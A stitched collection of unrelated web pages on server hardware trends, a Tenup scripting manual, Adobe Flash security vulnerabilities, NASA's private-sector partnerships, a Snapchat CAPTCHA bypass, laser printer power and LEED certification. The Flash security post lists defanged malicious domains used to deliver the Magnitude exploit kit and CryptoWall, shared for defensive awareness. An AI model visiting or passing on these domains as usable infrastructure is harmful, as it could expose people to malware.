The server is where organizations spend the bulk of their budgets when they build platforms – excepting, of course, the vast sums they lavish on writing or procuring their applications. We are old enough to remember when what happened in glass houses was called data processing, not the more vague information technology, and we would point out that what the industry calls a datacenter should, properly speaking, probably called a data processing center.
We are not snobs about the computing aspects of data processing here at The Next Platform, and we are certainly not prejudiced against storage or networking as is attested in our broad and deep coverage on all three aspects of a modern system. We are well aware of the fact that moving data from the slowest storage tiers of tape cartridges and disk drives up through networks and main memory and caches in the system out to the central processing units of servers is one of the more complex engineering dances ever orchestrated by humanity. And we suspect that very few people can see an entire system in their heads, even if they built them.
The View From Outside The Glass House
It is fun sometimes to just step back and really consider how complex something like a banking application or a weather simulation or a social media network serving over a billion and a half people truly is. And if you really want to blow your mind, try making the connections between systems within companies and then connections across companies and consumers over the Internet. Perhaps the only accurate metaphor, given this, is to call the entire Earth a data processing center. Any alien looking down from the outside of the atmosphere would clearly see that humanity is on the cusp of adding intelligence to the automation systems we have been gradually building since the advent of computing in the wake of World War II. It started with card-walloping mainframes doing bookkeeping and it is evolving into a massively sensored and, at some emergent level that might be short of consciousness we hope, self-regulating systems.
And still, beneath all of these layers and behind all of these interconnections, at the heart of it are some 40 million servers, chewing on all that data as their applications make the economy dance or entertain us with myriad distractions.
As we look to new processing, storage, and interconnect technologies and the architectures that will weave them together into systems, we can’t help but wonder if the servers that enterprises buy in a year, or two, or three will bear much of a resemblance to the ones they are accustomed to buying today. Many have predicted radical shifts in the past, and some occurred, such as the rise and ubiquity of X86 machines and the fall of proprietary minicomputers and Unix systems in the datacenter. And some have not. The advent of wimpy-cored microservers or the demise of the mainframe come to mind. Prediction is almost as difficult as invention.
We will be talking to experts over the course of this series of stories, and we are merely setting the stage here for those experts to speak, much as we did last year with the Future Systems series we did relating to high performance computing architectures. (See the bottom of this story for the Related Items section for links to those articles.) We will start with some general observations about the core components of the server and the general trends for their innovation, and we welcome your input and comments as this article series evolves.
It is not much of an exaggeration to say that a modern processor socket looks like a complete multiprocessing system implemented in silicon with main memory and other forms of storage externalized. Multicore processing came to RISC processors in 2001 beginning with the Power4 chip from IBM, and Sun Microsystems and Hewlett Packard followed suit. Intel got its first dual-core Xeons into the field in 2005, and since that time not only has the company done major microarchitectural shifts, such as adopting cores aimed at laptops in its servers, but it has ramped up the core count while at the same time bringing PCI-Express peripheral controllers and Ethernet networking interfaces onto the processor itself. With the Xeon D chips, Intel is bringing the chipset that links to peripherals (called the southbridge) onto the package, and it won’t be long before FPGA accelerators will be brought onto the die. (We think this might also be with a Xeon D chip that was created for hyperscalers, but that is just a guess.)
Here we are, at the dawn of the “Broadwell” Xeon v4 generation, where E5 processors will have up to 22 cores and E7s will have up to 24 cores according to the Intel roadmaps that The Next Platform got ahold of last May, we are starting to run out of processing increases coming from increasing core counts much as we hit the clock speed wall back in the early 2000s that led us down the road to multicore chips in the first place. And with the “Skylake” Xeon v5 generation, it looks like Intel will push the core count of the top bin processors up to 28 cores, according to those roadmaps, with all kinds of innovations wrapped around them. The cores are getting moderately faster with each generation, too, and the floating point performance has been much more radically increased as well in recent Xeon generations, but it is hard to imagine software that will be able to harness all of the compute in systems beyond that and future servers would seem to be ideal for workload consolidation but in terms of raw processing per thread, we cannot expect much in the way of performance increases. We will have to juggle more work across more threads and drive up utilization, and the threads will only get faster at a nominal rate between generations on the order 5 percent to 10 percent.
There are only a few other CPUs that matter in the datacenter. A handful of ARM chips from upstarts like AMD, Applied Micro, Broadcom, Cavium, and Qualcomm, some of which are starting to ramp now but none of which has scored a big win yet that can count as a tipping point in the server market. IBM’s Power8 chip is trying to follow ARM with a licensing and proliferation approach, and is counting on adoption in China to drive volumes much as the ARM collective is doing. The ARM collective is hoping to capture 25 percent share of server shipments by 2020, and IBM’s top brass similarly aspire for the OpenPower platform to attain 10 percent to 20 percent market share. These are both lofty aims, and both camps are depending on heavy adoption in China, which is facing a number of economic challenges at the moment. The Sparc processors from Oracle and Sparc64 chips from Fujitsu still count, too, and by 2017, AMD will have its “Zen” CPUs in field as well, if all goes as planned.
But for now, the motor of choice for compute is the Xeon E5 processor and it is the one to beat. This is Intel’s market to lose, and it will take something truly radical to alter the market dynamics here. Intel is not exactly sitting still. Interestingly, Intel is positioning its future “Purley” platforms using the Skylake Xeons to consolidate the Xeon E5 and Xeon E7 lines to simplify server design for OEM and ODM partners and as well as customers who craft their own gear. The Purley platforms using Skylake Xeons will scale from two to four to eight sockets all with one processor family, socket design, and memory architecture, which has not been the case before. The Xeon E7s have had a different socket and memory design, and while this has added performance and scale, it has added costs. Intel has figured out how to accomplish its scale and reliability goals with a single, unified Xeon line, according to the roadmaps we have seen, which should make it all that more difficult for those peddling four-socket and larger systems to afford their differentiation. Intel will be working with third parties – presumably Hewlett Packard Enterprise, SGI, and NEC – to offer scalability beyond eight sockets for these future Skylake Xeons.
Aside from all of that, it is amazing to ponder just how much work a two-socket Xeon server with 56 cores and a few terabytes of mixed DRAM and 3D XPoint memory plus flash drives linked by NVM-Express links will be able to do. The node counts in clusters might actually go down if those cores can be kept fed and the machines run at high utilization. Which brings us to the exciting bit in future servers.
Memory And Storage
This is where the real action is. The addition of flash memory to radically expand I/O operations for data transfers and to lower latencies was just the first step in the transformation of the server. Looking ahead, Intel will be supplying memory sticks and drives for servers based on 3D XPoint memory, with the flash drives coming first this year and the memory sticks in 2017 possibly in conjunction with the Skylake servers. These machines, like the Haswell and Broadwell Xeon servers that preceded them, will also support DDR4 main memory, and Micron will also be peddling NVDIMM DRAM/flash hybrids as well SanDisk UlltraDIMM and Diablo Technologies Memory1 technologies. And PCI-Express flash cards and NVM-Express flash drives are going to continue to see wider adoption as capacities increase and prices come down.
Looking further out, we can expect to see stacked memory such as the Hybrid Memory Cube techniques developed by Micron and Intel and High Bandwidth Memory (HBM) approaches pushed by AMD, SK Hynix, Samsung, and Nvidia to appear in servers that are more hungry for memory bandwidth than memory capacity. This will probably not happen until these techniques are perfected for video card, accelerators, and network devices first. Intel’s “Knights Landing” has a variant of on-package memory inspired by HMC welded to its compute, and Nvidia’s future “Pascal” tesla coprocessors will have HBM as well. We have no idea when an ARM or Power or Xeon processor will get similar HBM or HMC memories, but as we have quipped in the past, we think the future server compute module will look more like a video card than a server motherboard.
The main thing to contemplate is that the memory hierarchy will be getting richer and deeper, and memories of various kinds will be pulled closer to the CPU complex in a server. This will presumably have dramatic impacts on the utilization of CPUs and how much work can be pushed through the system at a given price. Forgetting that last part – at a given price – is sometimes hard in the excitement around new technologies. But weighing those different memory technologies against each other – in a raw sense as well as when running real applications – and taking into account their price/performance will be a real challenge for IT organizations. So will be writing applications that know the difference between and can take advantage of the wide variety of volatile and non-volatile memories that will be available in future servers. That’s why we will be talking to the experts about the possibilities.
PCI Express And Network I/O
With the advent of non-volatile memory that comes in a DRAM form factor, hooking a reasonable slice of persistent memory into a server with very fast access is going to be a fairly simple affair. The rest of the I/O devices crammed into or hanging off the server will have to get to the CPU through PCI-Express interfaces, proprietary interfaces like IBM’s Coherent Accelerator Processor Interface (CAPI) for Power8 chips or like Nvidia’s NVLink with its Pascal Tesla cards, or Ethernet or InfiniBand network interfaces.
Every new generation of processor, storage, and networking has its challenges, and PCI-Express has certainly had those and, in fact, that is why IBM’s CAPI and NVidia’s NVLink were invented. PCI-Express 1.0 was launched in 2003 with devices able to push data at 2 Gb/sec (250 MB/sec) per lane each way, and in 2007 that was bumped up with PCI-Express 2.0 to 4 Gb/sec lanes (500 MB/sec). With PCI-Express 3.0 in 2010, the speed was doubled up again, with lanes running at 8 Gb/sec (1 GB/sec). Development on the PCI-Express 4.0 spec started in earnest in 2011, with another doubling up of bandwidth to 16 Gb/sec per lane (which is 2 GB/sec), and many had hoped to see it come to market in 2016, but it is looking more like it will take until 2017 or more before the first products come to market. The Skylake Xeons, tellingly, will sport PCI-Express 3.0 controllers and peripherals when they come out, probably in late 2017.
The question we have is whether the CPU memory bus and PCI-Express 3.0 peripheral bus will be up to the extra demands that will be put in them by processors with more cores and cache and all of those myriad memory and storage devices. It will be interesting to see how the system architects build their iron. | <urn:uuid:f83eafa7-dbf8-48bc-8bac-615bf512c3ab> | CC-MAIN-2017-04 | https://www.nextplatform.com/2016/02/04/future-systems-what-will-tomorrows-server-look-like/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00227-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953916 | 2,830 | 2.53125 | 3 |
Since the most powerful uses of Tenup all have to do with automation, in a way all the previous sections of this manual have led us to this moment. Here, we will learn how to customize your Tenup settings so that it knows certain information about your account. This will allow you to include less information in each command. Finally, we will look at how to use Tenup to build and run shell scripts. In Windows, a shell script is called a Batch File. Batch files always end in a .bat file extension.
In Mac OS X and Linux, shell scripts go by a few different names, but both Shell Script or Bash Script are appropriate. Shell script files in Mac OS X and Linux end in the .sh file extension.
Shell scripts are extremely useful. They allow you to write many commands in a single file that will be executed in the order in which they appear. Often, these commands work together, each command using the results of the one that preceded it to accomplish a task that would be difficult or impossible with a single command. However, you can create a shell script that runs a series of completely unrelated commands as well. This section will detail the concepts and best practices needed for writing shell scripts that contain multiple Tenup commands. | <urn:uuid:d30aad13-0a5b-421d-8bed-b5b20212fae3> | CC-MAIN-2017-04 | https://www.1010data.com/downloads/tenup/doc/AutomatingTenup.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00043-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952365 | 256 | 2.515625 | 3 |
Adobe Flash vulnerabilities – a never-ending string of security risks
You, me and millions other people in the world use Flash Player. To most of us, it’s a necessity and we don’t pay much attention to it, because it’s that thing that runs in the background that some apps need in order to work.
But here’s why you should care:
Adobe Flash is one of the preferred methods that cyber criminals use to attack users worldwide!
You might wonder why, so I’m going to take you on a short and informative ride through its troubled history, showing how all this affects you specifically.
Here are some numbers to start you off with:
- more than 500 million devices are addressable today with Flash technology, and it is projected there will be over 1 billion addressable devices by the end of 2015.
- more than 20,000 apps in mobile markets, like the Apple App Store and Google Play, are built using Flash technology.
- 24 of the top 25 Facebook games are built using Flash technology. The top 9 Flash technology enabled games in China generate over US$70 million a month.
- More than 3 million developers use the Adobe Flash technology to create engaging interactive and animated web content.
But here’s the worrying statistic of the set that Adobe provides:
- More than 400 million connected desktops update to the new version of Flash Player within six weeks of release.
Six weeks is a very long time when it comes to cyber security. In six weeks, millions of Flash users can be compromised. And the worse news is that they usually become victims of cyber attacks.
Do you how many Adobe Flash vulnerabilities were identified in the past 6 weeks?
And out of those 30 security vulnerabilities, 16 were critical, allowing information exposure, allowing attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors or to execute arbitrary code.
Translation: vulnerabilities in the code provided cyber criminals with the opportunity to infiltrate their own code into the victims’ computers. From there, they could do pretty much what they want, including collecting your login data, your credit card information or encrypting your computer and asking a hefty ransom.
But what does Flash actually do and why do we need it?
Adobe created Flash (formerly called Macromedia Flash and Shockwave Flash) as a platform that allows developers to create vector graphics, animation, browser games, rich Internet applications, desktop applications, mobile applications and mobile games.
Here’s what Flash can do:
- Display text and graphics to provide animations, video games and applications
- Allows audio and video streaming
- Can capture mouse, keyboard, microphone and camera input.
It can do lots of other things as well, but you probably already got the idea:
Flash is deeply ingrained in your web browser, your applications, and the websites you use every day.
- Flash Player is used on 110 million websites aka 11% of all the websites in the world!
- Adobe Air, also built in Flash, reaches more than 1 billion connected desktops!
- Adobe Reader is used by 2.9 million customers worldwide.
And all of them are constantly exposed to vulnerabilities which turn into cyber threats which, more often than not, turn into fully blown cyber attacks.
Let’s see how the number of Flash vulnerabilities has evolved in the past decade:
As you can see from the statistics, this year the number of security vulnerabilities in Flash has skyrocketed:
In 2014, it had a total of 76 vulnerabilities, but since the 1st of January 2015 it’s amassed 94!
Here’s a breakdown of these by type:
- 32 vulnerabilities allowed DoS attacks – attackers could execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
- 68 vulnerabilities allowed code execution from malicious sources.
- 17 vulnerabilities allowed overflow – an anomaly where a program that causes a violation of memory safety. The buffer overflow can modify how a program works, which may result in erratic program behavior, including memory access errors, incorrect results, crashes, or a breaches of system security.
- 28 vulnerabilities allowed memory corruption, as discussed above.
- 18 vulnerabilities allowed cyber criminals to bypass something and gain access to the victim’s computer and resources.
- 13 vulnerabilities allowed attackers to gain information from the victims’ computers.
And these types of threats can sometimes be combined to incur even more damage.
Can’t software developers use other, more secure platforms?
For a long time, Flash has been the platform of choice. Now developers can choose to use HTML 5 as an alternative, but this option hasn’t gained enough popularity to oust Flash as market leader.
And chances are, as another platform will become the go-to solution for developers, it will suffer the same fate as Flash.
But let’s see how things actually work:
So how do cyber criminals actually use Flash vulnerabilities against me?
The more complex software gets, the more security holes it has. It’s as simple as that.
This is a simple version of how things happen in real life:
A vulnerability or more are discovered.
The software maker, in this case Adobe, work on an update to fix it.
They release the update – sometimes relatively fast, because users are sure targets for cyber attacks – and more bugs appear.
And this loop NEVER ends.
Here’s how cyber criminals use vulnerabilities in Flash or other software to penetrate your system:
That’s why we insist that unpatched software is a huge security threat. By ignoring cyber threats and allowing vulnerabilities to exist, we’re fueling the malware economy, which is impacting all of us.
Cyber criminals have a number of approaches they use when targeting their victims:
- They can infiltrate advertising networks that deliver banners and infect those banners (which sometimes are displayed on healthy, normal websites)
- They can infect browser games
- They can be PDF documents that exploit vulnerabilities in readers, such as Adobe Reader, to drop ransomware or other types of malware
- They can penetrate desktop applications and many more.
To put it bluntly: they can be anywhere, without you ever knowing it.
Why most exploits kits target Flash and go undetected ‘till it’s too late
One of the most common methods of infection that cyber criminals use are exploit kits.
An exploit kit is a toolkit that automates the exploitation of client-side vulnerabilities, targeting browsers and programs that a website can invoke through the browser.
Here are the most heavily used exploit kits of 2014, according to Trustwave Global Security Report 2015:
And the award for most exploited application in 2014 goes to…. Adobe Flash!
With a whopping 33,2% share, Flash makes it to the top of the list, becoming a favorite vector for cyber attacks. The reason is, of course, the never-ending string of vulnerabilities presented at the beginning of this article.
And there’s another important aspect to it. Exploit kits are incredibly popular tools in the malware market! Cyber security specialist Lenny Zeltser explains why:
A key characteristic of an exploit kit is the ease with which it can be used even by attackers who are not IT or security experts. The attacker doesn’t need to know how to create exploits to benefit from infecting systems. Further, an exploit pack typically provides a user-friendly web interface that helps the attacker track the infection campaign.
Some exploit kits offer capabilities for remotely controlling the exploited system, allowing the attacker to create an Internet crimeware platform for further malicious activities.
Furthermore, exploits kits pose a serious challenge to traditional cyber security products, such as antivirus.
Antivirus can’t protect you from advanced exploit kits. Find out what can!
The thing is antivirus can’t protect you against these highly advanced exploit kits, because they sometimes never place a single file on your system. Since antivirus employs a file-detection system to identify a threat or an infection, it won’t be able to block an exploit kit such as Angler.
There are, of course, next generation anti-hacking tools that can help you enhance your protection against sophisticated threats, so I recommend you test them to see what fits your needs best.
Hot topic: the Zero Day vulnerability problem
Exploits kits are especially dangerous when they go after Zero Day vulnerabilities. A Zero Day vulnerability is a security hole in software that is unknown to the software vendor. That means that cyber criminals can exploit that hole before any updates that can fix it are released.
Here’s the Zero Day scenario, as depicted in the 2015 Trustwave Global Security Report:
If you want to go online protected from Zero Hour exploits and exploit kits in general, I recommend using a mix of security products that includes:
- an antivirus solution
- a product that ensure anti-exploit protection
- a security product that filters your Internet traffic for threats (and blocks them before reaching your system)
- and a patching tool that delivers updates as soon as they’re available!
Some of these products can be found standalone, and some of them include these features bundled, so a taking the time to do a bit of research could save you a lot of trouble in the future.
When it comes to Flash, it also has a history of Zero Day vulnerabilities that’s not something to ignore. In fact, the last Zero Day vulnerability to make headlines happened just last week!
The latest vulnerability in Flash Player: Magnitude exploit kit integrates Flash Player vulnerability
It’s only been 4 days from the latest critical security update released by Adobe and another misfortune bring up Flash’s security problems again.
The attack bypasses the majority of all traditional antivirus solutions, as well as a large number of gateways and security appliances, which the payload can slip past.
This leaves vulnerable installations open to several types of penetration and system manipulation:
- total information disclosure, resulting in all system files being revealed
- total compromise of system integrity – there is a complete loss of system protection, resulting in the entire system being compromised
- total shutdown of the affected resource – by which the attacker can render the resource completely unavailable
- very little knowledge or skill is required to exploit this security vulnerability
- authentication is not required to exploit the vulnerability.
Among the many campaigns which make use of Magnitude exploit kit, there is one that’s particularly active and extensive in scope. The campaign is delivered through a variety of dedicated drive-by domains, which we have already blocked through the Heimdal Secure DNS. A small section can be found below (sanitized by Heimdal Security):
carcs [.] in
pure wide [.] in
waypassed [.] in
Volume weeks [.] in
foodpartys [.] in
notedvalid [.] in
comingjumps [.] in
holiday final [.] in
inputtedhole [.] in
sidesmanuals [.] in
trace windows [.] in
childrenopens [.] in
lecturescause [.] in
quietlygrowth [.] in
station status [.] in
userssuspends [.] in
citizen seconds [.] in
The above are FQDNs (fully qualified domain names), but the campaign is designed with thousands of subdomains. The payload is delivered by determining which country the client comes from.
Read ahead for guidelines that you can use to protect yourself from these types of vulnerabilities.
UPDATE: 03.07.2015: A new and previously undocumented vulnerability that exists in multiple versions of Adobe Flash Player, has been reported from several sources, including Fortinet.
Heimdal Security has analyzed the exploit, and can confirm that it is different from previous exploits we have looked at.
The vulnerability is however patched with the latest security update from Adobe. This means that Adobe Flash Player version 18.104.22.168 and newer are not vulnerable. All vulnerable versions have long been patched for the Heimdal users.
As it appears from Fortinet’s blog and from out technical review, this is a different exploit than we have observed in the past. A spraying vector is used in combination with a glowfilter object and an established safety circumvention known as the “CFG bypass”.
That exploit recorded is Magnitude exploit kit, which is a commercial exploit kit that we have seen supplying also Cryptowall3 and Pony against vulnerable machines in Denmark.
The exploit achieves only very limited antivirus detection (5/55) and is transported to the client through script injections on legitimate web pages and through malvertizing.
A small sample of the CryptoWall distribution domains are reproduced below (sanitized by Heimdal Security):
microforgeandfitting [.] in
magaligilbert [.] com
matheusprado [.] net
loccidigital.com [.] br
noivasefestas [.] net
vllusionshop [.] org
loveyourneighbortour [.] com
mundofomix [.] com
mevtutorial [.] in
mduinfo [.] com
phulwaribiotech [.] com
ppinvesting [.] me
klovertel [.] com
All domains have already been blocked in the Heimdal Secure DNS.
As already mentioned, the exploit has a low AV detection (5/55), as we can see from the Virus Total page.
UPDATE: 09.07.2015: It´s only been 6 days since Adobe had to publish a critical security update for Flash Player. Now, less than a week later, they have to do it again.
This derives from a 0-day vulnerability which was leaked after the breach of Italian security company “Hacking Team”. This has exposed a so-far unknown vulnerability in the popular and widely used media player. We are therefore dealing with a 0-day vulnerability where a complete proof of concept is available.
The published exploit is confirmed to work on Windows 7 with a fully patched version of Flash Player. The vulnerability can be exploited by embedding code on a website which the victims are tricked to visit. Upon visiting the website, the exploit is ran and the arbitrary code runs with the same rights as the logged in user.
The exploit was part of a package in the surveillance tool “Da Vinci” that was published last weekend after the controversial company was hacked.
The vulnerability is called CVE-2015-5119. It exists in Adobe Flash Player from version 22.214.171.124 back all older versions for Windows and Macintosh. It also appears on Adobe Flash Player version 126.96.36.1998 and also exists in all older versions on Linux.
Heimdal has already deployed an update that automatically patches all vulnerable installations. You can also consult the latest Adobe Security Bulletin for more details.
So how do you protect yourself from cyber threats targeting Adobe Flash?
If you’ve read this blog before, you must’ve heard this plenty of times. Still, here it goes again:
Keep your software updated at all times!
Now there are 2 ways you can do this:
If you choose to update your software manually, you should never ignore an update prompt!
But what if you’re somewhere where you have limited Internet access?
Or click away the update window?
Or turn off your computer by mistake, run out of battery, etc., etc.?
Then you should choose option number 2. Automatic updates can be delivered via the Flash product itself or through various applications that have Flash built-in, such as Google Chrome.
The easiest way, however, is to use a patching application, that will update not only Flash, but also other vulnerable software on your system, such as browsers. You’ll never have to worry about another update again!
Also, since exploits use your browser most of the time, make sure you secure it properly. You can use the advice in this guide to enhance your browser’s protection and give you a bit more peace of mind.
Of course, you should always use the appropriate security products that offer a multi-layered protection. One product can’t solve all security problems, and there are plenty of those, as you’ve read.
But is there another possible solution?
Can you live without Flash?
Yes, you can, but you might find it annoying if you’re used to having everything ready to go.
Security specialist Brian Krebs did an experiment earlier this month and tried to go without Flash Player for a month.
In almost 30 days, I only ran into just two instances where I encountered a site hosting a video that I absolutely needed to watch and that required Flash (an instructional video for a home gym that I could find nowhere else, and a live-streamed legislative hearing).
Moreover, Brian Krebs suggest another 2 possible solutions for those who want to be safe and use Flash Player once in a while, when they really, really have to.
If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.
Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).
In hindsight, Steve Job’s decisions to give up Flash was very appropriate, although it may not have seemed so for many at that time.
The ongoing debate over the death or near-death of Flash might take some time to unfold, and Flash may even recover from its current state – who knows? Oracle’s Java used to be the main vector used by cyber criminals, and now 14,5% of exploits target it – which is not great, but it’s not disastrous either.
But until Flash’s security increases, we should all be cautious. Using free software may sometimes cost you your privacy or security, or both. Don’t let that be the case.
Keep your software up to date, use the appropriate cyber security tools and keep an eye out for trouble. That’s what you need to enjoy everything that the web has to offer! | <urn:uuid:4ca0cea4-9b94-4868-9c76-b8252af7fc91> | CC-MAIN-2017-04 | https://heimdalsecurity.com/blog/adobe-flash-vulnerabilities-security-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00345-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919461 | 3,875 | 2.625 | 3 |
Much to the chagrin of any kids who grow up idolizing astronauts, the start of the 21st century has marked an era of cutbacks for NASA. The space shuttle program shut down in 2011. A year later, Congress trimmed NASA’s overall budget appropriation by $648 million. Now that the Constellation program has lost its funding, prospects look bleak for sending astronauts back to the moon. In 1980, the United States had 100 percent of the global rocket launch capability. That share dropped to zero several years ago, but is now inching back up, thanks to private space flight.
The dismal outlook is a far cry from the heady days of the 1960s. It was then, just three years after NASA was created in 1958, that President John F. Kennedy issued his famous directive declaring that by the end of the decade the United States would send a man to the moon and bring him home safely.
NASA has radically scaled back, but space travel survives. How? In the face of fiscal constraints, the agency has changed its role. For the United States, space exploration is evolving from a government-led venture to a rich collaboration with the private sector.
As NASA has reduced its commitments, a dynamic private sector space ecosystem has sprung up vigorously into the void, and with the agency’s strong support. Richard Branson’s Virgin Galactic, for example, is developing a spacecraft to launch tourists into orbit and facilitate at least $4.5 million in NASA research contracts, prompting New Mexico to build a $209 million spaceport. Blue Origin, led by Amazon.com founder and chief executive Jeff Bezos, is developing space vehicles designed to launch and land on retractable legs. A startup called NanoRacks helps scientists who need zero-gravity environments transport their experiments to the International Space Station.
Many other companies, including Orbital Sciences, XCOR Aerospace, and Boeing, are testing vehicles for space travel. NASA is helping Moon Express Inc. develop robots to search the moon for precious metals. XCOR Aerospace is developing a two-seater Lynx vehicle to shuttle passengers to space for $95,000 a trip. Space Adventures has already sent seven people to the International Space Station from a Soviet-era launch facility in Kazakhstan.
One of the most interesting players in the new space ecosystem is SpaceX, of Hawthorne, Calif. SpaceX has more than $3 billion in contracts for more than 30 launches, including $1.6 billion from NASA. Its unmanned Dragon capsule docked on the space station in May 2012, in what was likely one of many supply runs to come.
Launched in 2002 by Elon Musk, the co-founder of PayPal and Tesla Motors, SpaceX intends to vastly reduce the cost of space ventures. “Today it costs over a billion dollars for a space shuttle flight,” Musk says. “The cost . . . is fundamentally what’s holding us back from becoming a space traveling civilization and ultimately a multiplanet species.”
Surprisingly, NASA feels no sense of rivalry with these emerging space entrepreneurs. “We have an enlightened self-interest in seeing the industry players do well,” explains Joe Parrish, NASA’s deputy chief technologist. Not only has the agency welcomed the new players in space, but it has also radically reengineered its own business model to take advantage of outside innovation. This approach sets NASA apart from most other government agencies
“Partnering with U.S. companies such as SpaceX to provide cargo and eventually crew service to the International Space Station is a cornerstone of the president’s plan for maintaining America’s leadership in space,” says John P. Holdren, assistant to the president for science and technology. “This expanded role for the private sector will free up more of NASA’s resources to do what NASA does best—tackle the most demanding technological challenges in space, including those of human space flight beyond low Earth orbit.”
NASA shows how an organization can nimbly adapt to resource constraints, offering the following lessons for agencies shifting roles within their fields:
- Instead of seeing new entrants as a threat, consider potential win-win scenarios that also yield public value.
- Support the development of platforms and exchanges that enable different providers to work together toward solving the big problems that affect everyone. You can’t begin to think about ways to combine capabilities with partners unless you know who they are and their specialties, a process that platforms can simplify.
- Get creative about the resources you can bring to the emerging ecosystem and that will provide a springboard for solutions. Perhaps it is funding, or convening a multidisciplinary team of wavemakers or something as simple as physical space for early-stage innovators to experiment side by side.
Pooling these disparate resources will reinforce that there’s more support available for problem-solving than one solitary approach. This awareness boosts not only your organization’s morale, but also the chance of reaching a solution.
William D. Eggers, leader of public sector research at Deloitte, and Paul Macmillan, the global public sector leader for Deloitte Touche Tohmatsu, are the authors of The Solution Revolution: How Business, Government, and Social Enterprises are Teaming up to Solve Society’s Toughest Problems (Harvard Business Press, 2013), which was released on Tuesday. | <urn:uuid:8a5b8bd0-7846-46a3-ab84-13ba60cdc6b2> | CC-MAIN-2017-04 | http://www.nextgov.com/emerging-tech/2013/09/analysis-nasas-new-role-partner/70468/?oref=ng-HPriver | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00161-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942234 | 1,110 | 3.265625 | 3 |
Snapchat has demonstrated again its lack of understanding in building strong security to protect users of its popular mobile app for sharing photos.
The company introduced last week a CAPTCHA verification method for checking whether a new subscriber is human or a computer program. Cybercriminals will use the latter to set up fake accounts in order to distribute spam or to find ways to steal the personal information of users of the service.
CAPTCHA methods can help reduce the number of fake accounts, but Snapchat's implementation was easily hacked by Steven Hickson, a graduate research assistant at the Georgia Institute of Technology.
In fact, Snapchat's CAPTCHA was so weak, Hickson spent less than an hour building a computer program that could fool the mobile app maker's system with "100 percent accuracy."
"They're a very, very new company and I think they're just lacking the personnel to do this kind of thing," Hickson told CSOonline Monday.
To ensure the would-be user is human, the Snapchat system asks the registrant to choose out of nine illustrations the ones containing Snapchat's white ghost mascot. The problem with the system is that the mascot image varies only in size and angle, making it easy for a computer to find.
To avoid hacking a CAPTCHA system, "you want something that has a lot of variety in the answer," Hickson said. "Basically, one right answer, but a very, very large amount of wrong answers. You want something that's very, very hard for a computer to solve."
Hickson provides the technical details of the hack on his blog. In general, he used Intel's Open Source Computer Vision Library (OpenCV) and a couple of other supporting technologies, to build the program capable of identifying the Snapchat mascot in the illustrations. OpenCV is a library of programming functions that are aimed at giving computers the ability to identify images.
Zach Lanier, senior security researcher for mobile authentication specialist Duo Security, said Hickson's CAPTCHA bypass is "totally legitimate."
"In my opinion, if Snapchat is really concerned about improving security, they should take some lessons from Hickson's findings," Lanier said.
Chris Grayson, senior security analyst for consultancy Bishop Fox, agreed, saying "the CAPTCHA mechanism that they implemented is decidedly weak, as demonstrated by Steven Hicksons proof-of-concept, and offers little additional security to Snapchat users."
Snapchat did not respond to a request for comment.
Mobile app developers have become notoriously weak in building adequate security to protect users' personal information. Recent studies have shown serious weaknesses in data protection in mobile apps built by small vendors, as well as airlines, retail outlets, entertainment companies, insurance companies and financial institutions.
Mobile app security is often given a lower priority than rolling out features, because there has not been a major breach where valuable financial data has been stolen from a smartphone. However, the risk of such a breach will rise as the number of purchases made with a smartphone increases, along with the value of the data stored on the devices.
While security will slowdown the app development process, "it's extremely necessary," Hickson said.
Hickson's work follows on the heels of another incident in which hackers exploited a weakness in Snapchat's feature for finding friends by displaying the usernames of people whose phone numbers match those in other users' address books. Hackers used the vulnerability to steal the usernames and phone numbers of more than 4 million users.
Snapchat updated the app to let users opt out of having their phone numbers linked to their usernames. In addition, people are now required to verify their phone number before using the service called "Find Friends."
This story, "Snapchat falters on security again, experts say" was originally published by CSO. | <urn:uuid:d64d54f1-4443-47fd-9f75-0ee420e38d08> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2173807/byod/snapchat-falters-on-security-again--experts-say.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00373-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953484 | 778 | 2.6875 | 3 |
When finding a location to set up a laser printer, one commonly overlooked consideration is power.
Most often I see laser printers placed in a location where the printer is connected to the same power circuit that has other devices plugged in, such as a computer.
Laser printers should, whenever possible, be plugged into their own dedicated circuit.
When printing, laser printers consume a lot of power. If another device, such as a computer, is plugged in to the same circuit, there is a risk that the printer can cause power issues, such as a “brownout”. A brownout is a momentary drop, but not a complete loss of power. This drop can cause serious damage to the computer, and the parts inside.
Laser printers should also never be plugged in to a battery backup device, or UPS. The power used by a laser printer while printing can damage the battery inside, and may void the warranty.
These considerations only apply to laser printers. Other printers such as inkjet or dot-matrix printers consume a lot less power, and do not pose a risk to other equipment plugged in to the same circuit. | <urn:uuid:37b569da-82fc-4550-bc50-0883749bc2ec> | CC-MAIN-2017-04 | http://wiki.sirkit.ca/2013/01/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00097-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939023 | 234 | 2.8125 | 3 |
What is LEED Certification for Data Centers?
Leadership in Energy and Environmental Design (LEED), developed by the US Green Building Council, is a set of rating systems for the design, construction, operation and maintenance of green buildings. The certifications come as Silver, Gold and Platinum, and the highest Platinum certification indicates the highest level of environmentally responsible construction with efficient use of resources.
